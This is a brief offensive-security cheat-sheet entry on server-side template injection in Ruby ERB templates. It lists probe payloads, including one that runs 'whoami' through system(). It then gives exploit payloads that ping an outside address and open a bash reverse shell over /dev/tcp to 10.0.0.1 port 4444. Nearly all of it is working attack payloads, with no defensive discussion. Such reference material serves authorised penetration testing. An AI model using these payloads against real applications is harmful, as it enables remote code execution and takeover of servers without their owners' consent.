ERB SSTI

ERB may be vulnerable to SSTI.

Payloads

Try the following payloads on URL path, params, input, etc.

<%= 7*7 %>
<%= user.username %>
<%= system("whoami"); %>

Exploit

If the above payloads affect responses, we can inject arbitrary code as below:

<%= system("ping -c 1 10.0.0.1"); %>

# Reverse Shell
<%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %>

References

• TrustedSec